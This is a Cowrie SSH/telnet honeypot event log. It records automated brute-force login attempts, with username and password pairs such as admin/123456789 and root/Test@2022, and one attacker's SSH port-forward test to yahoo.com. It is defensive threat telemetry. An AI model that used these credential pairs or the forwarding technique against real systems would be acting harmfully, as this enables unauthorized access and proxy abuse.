{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:39:08.913488Z","src_ip":"212.227.235.229","session":"52ad56d81823"}
{"eventid":"cowrie.session.closed","duration":"14.5","message":"Connection lost after 14.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:39:23.020606Z","src_ip":"212.227.235.229","session":"52ad56d81823"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58702,"dst_ip":"1.2.3.4","dst_port":22,"session":"61ce0e1c3945","protocol":"ssh","message":"New connection: 217.72.205.35:58702 (1.2.3.4:22) [session: 61ce0e1c3945]","sensor":"my-vps","timestamp":"2025-08-26T06:39:31.141659Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:39:31.143398Z","src_ip":"217.72.205.35","session":"61ce0e1c3945"}
{"eventid":"cowrie.session.connect","src_ip":"113.161.237.125","src_port":37762,"dst_ip":"1.2.3.4","dst_port":23,"session":"afdc35fcec1e","protocol":"telnet","message":"New connection: 113.161.237.125:37762 (1.2.3.4:23) [session: afdc35fcec1e]","sensor":"my-vps","timestamp":"2025-08-26T06:39:44.359707Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46372,"dst_ip":"1.2.3.4","dst_port":22,"session":"daf15510d610","protocol":"ssh","message":"New connection: 212.227.235.229:46372 (1.2.3.4:22) [session: daf15510d610]","sensor":"my-vps","timestamp":"2025-08-26T06:39:46.171798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T06:39:46.175338Z","src_ip":"212.227.235.229","session":"daf15510d610"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T06:39:46.299830Z","src_ip":"212.227.235.229","session":"daf15510d610"}
{"eventid":"cowrie.login.failed","username":"admin","password":"atjp4CDA","message":"login attempt [admin/atjp4CDA] failed","sensor":"my-vps","timestamp":"2025-08-26T06:39:46.847044Z","src_ip":"212.227.235.229","session":"daf15510d610"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T06:39:47.975492Z","src_ip":"212.227.235.229","session":"daf15510d610"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Enercon24","message":"login attempt [admin/Enercon24] failed","sensor":"my-vps","timestamp":"2025-08-26T06:39:49.102450Z","src_ip":"212.227.235.229","session":"daf15510d610"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1150221410*","message":"login attempt [admin/1150221410*] failed","sensor":"my-vps","timestamp":"2025-08-26T06:39:50.229774Z","src_ip":"212.227.235.229","session":"daf15510d610"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin12345","message":"login attempt [admin/admin12345] failed","sensor":"my-vps","timestamp":"2025-08-26T06:39:51.357413Z","src_ip":"212.227.235.229","session":"daf15510d610"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:39:52.485555Z","src_ip":"212.227.235.229","session":"daf15510d610"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49796,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bb53fd259ac","protocol":"ssh","message":"New connection: 212.227.235.229:49796 (1.2.3.4:22) [session: 0bb53fd259ac]","sensor":"my-vps","timestamp":"2025-08-26T06:40:00.784788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:40:00.786920Z","src_ip":"212.227.235.229","session":"0bb53fd259ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:40:01.240268Z","src_ip":"212.227.235.229","session":"0bb53fd259ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":11968,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc91bb30b901","protocol":"telnet","message":"New connection: 212.227.125.160:11968 (1.2.3.4:23) [session: fc91bb30b901]","sensor":"my-vps","timestamp":"2025-08-26T06:40:03.292325Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-08-26T06:40:03.295229Z","src_ip":"212.227.125.160","session":"fc91bb30b901"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-26T06:40:03.296091Z","src_ip":"212.227.125.160","session":"fc91bb30b901"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-26T06:40:03.296880Z","src_ip":"212.227.125.160","session":"fc91bb30b901"}
{"eventid":"cowrie.session.closed","duration":0.13902926445007324,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:40:03.431283Z","src_ip":"212.227.125.160","session":"fc91bb30b901"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":11970,"dst_ip":"1.2.3.4","dst_port":23,"session":"0c6b41e9b725","protocol":"telnet","message":"New connection: 212.227.125.160:11970 (1.2.3.4:23) [session: 0c6b41e9b725]","sensor":"my-vps","timestamp":"2025-08-26T06:40:03.563118Z"}
{"eventid":"cowrie.session.closed","duration":0.0014927387237548828,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:40:03.564529Z","src_ip":"212.227.125.160","session":"0c6b41e9b725"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:40:09.694495Z","src_ip":"212.227.235.229","session":"0bb53fd259ac"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":53482,"dst_ip":"1.2.3.4","dst_port":22,"session":"3afb7cc2333a","protocol":"ssh","message":"New connection: 45.88.8.186:53482 (1.2.3.4:22) [session: 3afb7cc2333a]","sensor":"my-vps","timestamp":"2025-08-26T06:40:49.830102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:40:50.291173Z","src_ip":"45.88.8.186","session":"3afb7cc2333a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:40:50.292459Z","src_ip":"45.88.8.186","session":"3afb7cc2333a"}
{"eventid":"cowrie.login.success","username":"root","password":"ganeshji","message":"login attempt [root/ganeshji] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:40:52.930484Z","src_ip":"45.88.8.186","session":"3afb7cc2333a"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:40:53.550750Z","src_ip":"45.88.8.186","session":"3afb7cc2333a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38140,"dst_ip":"1.2.3.4","dst_port":22,"session":"db451f9deac5","protocol":"ssh","message":"New connection: 212.227.235.229:38140 (1.2.3.4:22) [session: db451f9deac5]","sensor":"my-vps","timestamp":"2025-08-26T06:41:11.816010Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16619,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0793e67ea26","protocol":"ssh","message":"New connection: 213.209.150.239:16619 (1.2.3.4:22) [session: b0793e67ea26]","sensor":"my-vps","timestamp":"2025-08-26T06:41:30.294430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:41:30.295614Z","src_ip":"213.209.150.239","session":"b0793e67ea26"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T06:41:30.352277Z","src_ip":"213.209.150.239","session":"b0793e67ea26"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:41:30.635018Z","src_ip":"213.209.150.239","session":"b0793e67ea26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":10957,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10957","sensor":"my-vps","timestamp":"2025-08-26T06:41:30.692493Z","session":"b0793e67ea26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:41:30.749021Z","src_ip":"213.209.150.239","session":"b0793e67ea26"}
{"eventid":"cowrie.session.closed","duration":"19.0","message":"Connection lost after 19.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:41:30.803822Z","src_ip":"212.227.235.229","session":"db451f9deac5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6221,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6221","sensor":"my-vps","timestamp":"2025-08-26T06:41:30.903009Z","session":"b0793e67ea26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:41:30.959570Z","src_ip":"213.209.150.239","session":"b0793e67ea26"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:41:31.016927Z","src_ip":"213.209.150.239","session":"b0793e67ea26"}
{"eventid":"cowrie.session.closed","duration":120.01394391059875,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:41:44.373571Z","src_ip":"113.161.237.125","session":"afdc35fcec1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52252,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0ad8714b16a","protocol":"ssh","message":"New connection: 212.227.235.229:52252 (1.2.3.4:22) [session: a0ad8714b16a]","sensor":"my-vps","timestamp":"2025-08-26T06:41:51.236259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:41:51.237334Z","src_ip":"212.227.235.229","session":"a0ad8714b16a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:41:51.693288Z","src_ip":"212.227.235.229","session":"a0ad8714b16a"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:41:55.085854Z","src_ip":"212.227.235.229","session":"a0ad8714b16a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59608,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dbf2fadae2f","protocol":"ssh","message":"New connection: 212.227.235.229:59608 (1.2.3.4:22) [session: 8dbf2fadae2f]","sensor":"my-vps","timestamp":"2025-08-26T06:42:14.644377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:42:14.645321Z","src_ip":"212.227.235.229","session":"8dbf2fadae2f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:42:16.586551Z","src_ip":"212.227.235.229","session":"8dbf2fadae2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38891,"dst_ip":"1.2.3.4","dst_port":22,"session":"e589126e4adb","protocol":"ssh","message":"New connection: 212.227.235.229:38891 (1.2.3.4:22) [session: e589126e4adb]","sensor":"my-vps","timestamp":"2025-08-26T06:42:44.923063Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":49790,"dst_ip":"1.2.3.4","dst_port":22,"session":"78ca610e8ae1","protocol":"ssh","message":"New connection: 103.12.154.87:49790 (1.2.3.4:22) [session: 78ca610e8ae1]","sensor":"my-vps","timestamp":"2025-08-26T06:42:46.915042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:42:46.921129Z","src_ip":"103.12.154.87","session":"78ca610e8ae1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:42:47.125734Z","src_ip":"103.12.154.87","session":"78ca610e8ae1"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T06:42:48.594311Z","src_ip":"103.12.154.87","session":"78ca610e8ae1"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:42:49.802825Z","src_ip":"103.12.154.87","session":"78ca610e8ae1"}
{"eventid":"cowrie.session.closed","duration":"30.2","message":"Connection lost after 30.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:43:15.158307Z","src_ip":"212.227.235.229","session":"e589126e4adb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57278,"dst_ip":"1.2.3.4","dst_port":22,"session":"932d44ca2411","protocol":"ssh","message":"New connection: 212.227.235.229:57278 (1.2.3.4:22) [session: 932d44ca2411]","sensor":"my-vps","timestamp":"2025-08-26T06:43:43.370731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:43:43.371732Z","src_ip":"212.227.235.229","session":"932d44ca2411"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:43:43.832907Z","src_ip":"212.227.235.229","session":"932d44ca2411"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:43:47.351428Z","src_ip":"212.227.235.229","session":"932d44ca2411"}
